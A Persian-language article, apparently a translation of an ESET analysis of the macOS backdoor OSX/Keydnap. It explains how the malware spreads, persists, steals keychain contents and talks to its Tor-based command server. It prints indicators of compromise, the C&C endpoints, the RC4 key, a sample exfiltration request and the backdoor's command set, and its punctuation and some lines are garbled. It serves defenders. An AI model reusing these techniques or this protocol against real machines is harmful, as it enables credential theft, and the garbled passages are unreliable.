LOADING CLOSE

بدافزار OSX Keydnap به دنبال داده‌های کاربر

بدافزار OSX Keydnap به دنبال داده‌های کاربر

بدافزار OSX Keydnap به دنبال داده‌های کاربر

بدافزار OSX Keydnap

بدافزار OSX Keydnap به دنبال داده‌های کاربر 

در هفته‌های اخیر لابراتوارهای ESET در حال تحقیق درباره یک بدافزار جدید هستند. که OSX/Keydnap نام دارد و به نظر می‌رسد .که هدف آن سرقت محتوای keychain و حفظ یک درب پشتی دائمی می‌باشد. اطلاعات در دست تا به امروز در مورد این تهدید به شرح ذیل است.

بردار آلودگی

هنوز مشخص نیست. که قربانیان چگونه توسط OSX/Keydnap آلوده می‌شوند. این امر ممکن است. از طریق ضمیمه در پیام‌های اسپم، دانلودها از سایت‌های غیر. امن یا مورد دیگری باشد. اجزا downloader .توسط یک فایل .zip توزیع می‌گردد. فایل آرشیو دارای یک فایل قابل‌اجرا Mach-O است که دارای پسوندی مانند .txt یا .jpg می‌باشد. اما پسوند فایل درواقع دارای. یک کارکتر خالی در پایان است. با دو کلیک روی فایل، آن در Terminal باز می‌شود. و نه در Preview یا TextEdit.

keydnap1

شکل 1- پنجره جستجوگر (Finder) فایل zip دارای فایل مخرب .jpg

keydnap2
شکل 2- پنجره اطلاعات فایل downloader

فایل زیپ نیز دارای Resource fork است که icon فایل در آن قابل‌اجرا می‌باشد. این ایکن Finder را تقلید می‌کند. پس از اجرا، یک پنجره Terminal باز می‌شود و payload مخرب اجرا می‌شود.

دانلودر OSX/Keydnap

این دانلودر یک فایل بدون امضا اجرایی Mach-0 است. اگر فایل با یک مرورگر دانلود شود. و Gatekeeper بر روی سیستم فعال باشد، آن .اجرا نمی‌شود و یک هشدار به کاربر نشان می‌دهد. Gatekeeper برنامه. پیش‌فرض نسخه‌های اخیر OS X و MacOS می‌باشد.

keydnap3
تصویر 3: پیام نشان داده‌شده اگر فایل ZIP در مرورگر Safari دانلود شود.

پروسه عملکرد دانلودر Keydnap ساده است:
1. دانلود کردن و اجرای اجزا backdoor.
2. جایگزینی محتوا از فایل اجرایی دانلودر Mach-0 توسط یک برنامه انحرافی، با استفاده از یک فایل embedded و رمزنگاری‌شده base64 یا با دانلود شدن از اینترنت.
3. باز کردن یک فایل انحرافی.
4. بستن پنجره ترمینالی که باز می‌شود.

فایل انحرافی. جایگزین فایل دانلودر Mach-0 می‌شود که یعنی فایل اجرایی مخرب .فقط در فایل ZIP موجود خواهد بود. دانلودر backdoor یک خط به دایرکتوری LaunchAgent اضافه خواهد کرد. و پس از reboot از بین نمی‌رود. چندین گونه از این دانلودر executable شناسایی‌شده است. اخیراً نمونه‌های از فایل‌های انحرافی دیده‌شده است. که screenshot های پانل‌های botnet C&C و یا حجم‌های شماره‌های کارت‌های اعتباری هستند. این یعنی Keydnap ممکن است کاربران فوروم های زیرزمینی. یا حتی محققین امنیتی را هدف قرار داده باشد. در گونه‌های اخیر یک build name وجود دارد مانند “elitef*ck”، “ccshop” و “Transmission”.

keydnap4
لتصویر 4: نمونه تصویر انحرافی (1

keydnap5
هتصویر 5: نمونه تصویر انحرافی (2.

keydnap6
تصویر 6: نمونه تصویر انحرافی (3ا

OSX/Keydnap backdoor

تمامی نمونه‌های درب پشتی شناسایی‌شده. تابه‌حال دارای اسم فایل “icloudsyncd” هستند. این بدافزار دارای یک version string است که به سرور C&C گزارش می‌کند و این مورد در دو نسخه (1.3.1 و 1.3.5) دیده‌شده است.
ابهامات (Obfuscation)
درحالی‌که ماژول دانلودر packed نمی‌باشد، درب پشتی با یک نسخه تغییریافته. از UPX pack شده است. در نسخه 3.91 دو تغییر به UPX ایجادشده است.
• بایت‌های UPX! در header با ASS7 جایگزین شده‌اند.
• کد decompress شدن و بخش‌های string با “0x01” “XOR” شده‌اند. درحالی‌که می‌توانند. خود را decompress کنند، XOR پس از decompress شدن و قبل از فراخوانی عملکرد اصلی باینری اولیه انجام می‌شود.

keydnap7
تصویر 7: اختلاف بین یک فایل packed و استاک UPX و یک فایل تغییریافته

یک پچ برای UPX از طرف شرکت ESET موجود است. که اجازه می‌دهد. که درب پشتی Keydnap توسط upx –d از حالت pack خارج شود.

دوام و پافشاری

پس از اجراشدن. درب پشتی Keydnap یک فایل plist در مسیر “/Library/LaunchAgents/” نصب می‌کند. و اگر مجوز روت (root privilages) داشته باشد در مسیر “$USER/Library/LaunchAgents/” .نصب می‌شود. و در غیر این صورت در طی reboot های مجدد سعی بر نصب شدن می‌کند. دایرکتوری ” Library/Application Support/com.apple.iCloud.sync.daemon” .برای حفظ اجرایی بودن ” icloudsyncd” استفاده می‌شود. این directory دارای شناسه. پروسه (process ID) بدافزار در حال. اجرا در process.id و یک “buildname” در build.id می‌باشد. با داشتن مجوز ادمین (administrator privileges)، .بدافزار مالک icloudsyncd را به root:admin تغییر می‌دهد. و “setuid” و “setgid” را قابل‌اجرا می‌سازد. که یعنی از این به بعد همیشه به‌عنوان root اجرا خواهد شد.

keydnap8
تصویر 8: فایل لیست Property در دایرکتوری LaunchAgent

برای استتار. محل فایل‌های مخرب Keydnap فایل argv[0] را با “/usr/libexec/icloudsyncd –launchd netlogon.bundle” .جایگزین می‌کند. در اینجا نمونه‌ای. نتیجه ps ax را در یک سیستم آلوده مشاهده می‌کنیم.

keydnap9
تصویر 9: نتیجه ps ax را در یک سیستم آلوده

سرقت keychain

درب پشتی OSX/Keydnap به مکانیزم جمع‌آوری و exfilter کردن اسم رمزها. و کلیدها در keychain OS X مجهز می‌باشد. نویسنده فقط یک. مثال به‌عنوان proof-of-concept .یک نمونه به اسم Keydumpchain از Github برداشت کرده است. آن حافظه security را خوانده و به دنبال کلید. رمزگشایی برای keychain کاربر می‌گردد. یکی از دلایلی که ممکن است. منبع مستقیماً از Github برداشته‌شده باشد. این است. که اسم عملکرد در source code دقیقاً مانند اسم در بدافزار Keydnap است.

keydnap10
تصویر 10: لیست عملکرد درب پشتی OSX/Keydnap. عملکردهای از Keychaindump سبز هستند.

ارتباط با C&C

Keydnap از پراکسی onion.to Tor2Web در HTTPS برای ارسال. گزارشات. به سرور C&C خود استفاده می‌کند. در نمونه‌های مختلف دو آدرس onion دیده‌شده است.

• g5wcesdfjzne7255.onion (Down)
• r2elajikcosf7zee.onion (Alive at time of writing)

منبع HTTP همیشه با /api/osx/ شروع می‌شود و دارای عملکردهای به شرح ذیل است:

• ./api/osx/started to report the bot has just started
• -/api/osx/keychain to exfiltrate the content of the keychain
• _/api/osx/get_task?bot_id={botid}&version={version} to request a task (described below)
• (/api/osx/cmd_executed to report a the output of a command that was executed
• )/api/osx/task_complete?bot_id={botid}&task_id={taskid} to report a task was completed

محتوای HTTP POST .دو فیلد دارد: bot_id و data. فیلد data رمزگذاری شده. با کلید RC4 key “u2RLhh+!LGd9p8!ZtuKcN” است. در زمان exfilter کردن keychain فیلد keychain به‌جای data استفاده می‌شود..

POST /api/osx/started HTTP/1.1
Host: r2elajikcosf7zee.onion.to
Accept: */*
Content-Length: 233
Content-Type: application/x-www-form-urlencoded

a8965ba04e72909f36c8d16aa801794c6d905d045c2b704e8f0a9bbb97d3eb8&data=psX0DKYB0u…5TximyY{fea3c28d3890e38680ec32848aac0d612e51e58d6c76d9449e10e3199002478e}2BQY{fea3c28d3890e38680ec32848aac0d612e51e58d6c76d9449e10e3199002478e}3Dbot_id=9

تصویر 11: ارسال اطلاعات اولیه توسط بدافزار

 

keydnap12
تصویر 12: ارسال داده‌های decode شده به C&C

bot_id با هش کردن. ارزش‌های ذیل با SHA-256 ساخته می‌شود.

1. سخت‌افزار UUID (IOPlatformUUID)
2. شماره سریال سیستم (IOPlatformSerialNumber)
3. شناسه مدل Mac (e.g.: MacBookPro9,2)

درک بیشتر دستورات ساده است. دستور اطلاعات ذیل را به ارسال می‌کند.

• device_model: ح.the  model identifier (e.g.: MacBookPro9,2).
• bot_version: جversion of Keydnap.
• build_name: قthe “build name” that was given by downloader.
• os_version: گOS X or macOS kernel version.
• ip_address: نexternal IP address as reported by ipify.org.
• has_root:س 1 if executed as root, 0 otherwise.
Backdoor commands

دستورهای درب پشتی

پاسخ به دستور get_task دارای یک integer برای شناسایی نوع دستور. و argument های انتخابی می‌باشد. عملکرد get_and_execute_tasks 10 نوع دستور مختلف را مدیریت می‌کند.

Command ID Description
0 Uninstall Keydnap and quit
1 Update the backdoor from a base64-encoded file
2 Update the backdoor given a URL
3 Decode and execute a base64-encoded file
4 Decode and execute a base64-encoded Python script
5 Download and execute a file from a URL
6 Download and execute a Python script from a URL
7 Execute a command and report the output back to the C&C server
8 Request administrator privileges the next time the user runs an application
9 Decode and execute, or stop, a base64-encoded file calledauthd_service

دو دستور آخر مشخصاً متفاوت هستند. دستور شماره 8 باید زمانی ارسال شود. که keydnap در حال root عمل نمی‌کند. در زمان انتشار درب پشتی شروع. به مانیتور کردن پروسه شمارش کاربر می‌شود. وقتی‌که دو پروسه در دو ثانیه ایجاد. شود، keydnap یک پنجره جدید ایجاد می‌کند. و از کاربر درخواست شناسه می‌کند. که دقیقاً مانند. درخواست دسترسی ادمین در برنامه‌ها برای کاربران OS X است. اگر کاربر گول بخورد و شناسه ارائه دهد درب پشتی به‌عنوان root اجرا می‌شود و محتوای keychain قربانی exfiltrate خواهد شد.

keydnap13
تصویر 13: کد اجرا پروسه check count

keydnap14
تصویر 14: درخواست دسترسی icloudsyncd

مشخص نیست که فایل اجرایی authd_service .در شماره 9 چیست چون تابه‌حال استفاده آن دیده نشده است.

جمع‌بندی

در حال حاضر. از روش توزیع OSX/Keydnap آگاه نیستیم. و تعداد قربانیان را نیز نمی‌دانیم. چندین مکانیزم جلوگیری از بدافزار OSX/Keydnap وجود دارد اما بااین‌حال می‌توان کاربر را گول زد تا کد مخرب غیر sandbox را (با گذاشتن یک icon در فایل Mach-0) اجرا کند.

IoC ها

keydnapww

نمونه‌ها

Downloader

همه دانلودرها در لیست زیر توسط ESET به‌عنوان OSX/TrojanDownloader.Keydnap.A شناسایی‌شده‌اند.

keydnapxx

بدافزار OSX Keydnap به دنبال داده‌های کاربر

دیدگاهتان را بنویسید